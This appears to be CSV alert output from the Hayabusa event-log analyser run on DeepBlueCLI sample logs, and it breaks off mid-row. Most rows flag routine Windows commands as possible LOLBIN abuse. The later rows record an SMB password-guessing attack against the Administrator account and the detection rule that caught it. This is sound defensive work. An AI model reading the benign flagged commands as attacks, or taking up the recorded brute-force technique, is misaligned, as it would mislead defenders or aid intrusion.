+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:56:17.454 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:56:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-18 07:56:46.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-09-18 07:56:47.806 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:56:48.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:01.618 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:01.696 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:03.862 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:04.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:05.547 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 08:05:28.818 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 08:05:29.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:53.723 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
2016-09-19 23:56:53.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:55.848 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:57:03.208 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x978 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:57:32.774 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:57:36.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:09:39.097 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:09:42.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:10:22.816 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:10:26.441 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:12:04.478 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: 
C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:12:15.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 00:13:03.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-09-20 00:13:05.430 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\poweron-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:05.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:06.461 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: IE10WIN7$ | 
LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:14.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:14.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:18.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:18.465 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:20.357 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc28 | 
User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:40.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:40.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:14:08.521 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:14:09.193 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:15:06.588 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:15:06.635 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:21:37.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:21:40.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:26:11.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:26:16.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:26:42.937 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:45:37.636 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:36:17.350 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,info,,Logon Failure - User Does Not Exist,User: JcDfcZTc | Type: 3 | Computer: 6hgtmVlrrFuWtO65 | 
IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.513 +09:00,-,-,medium,CredAccess,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- 2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong 
Password,User: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.169 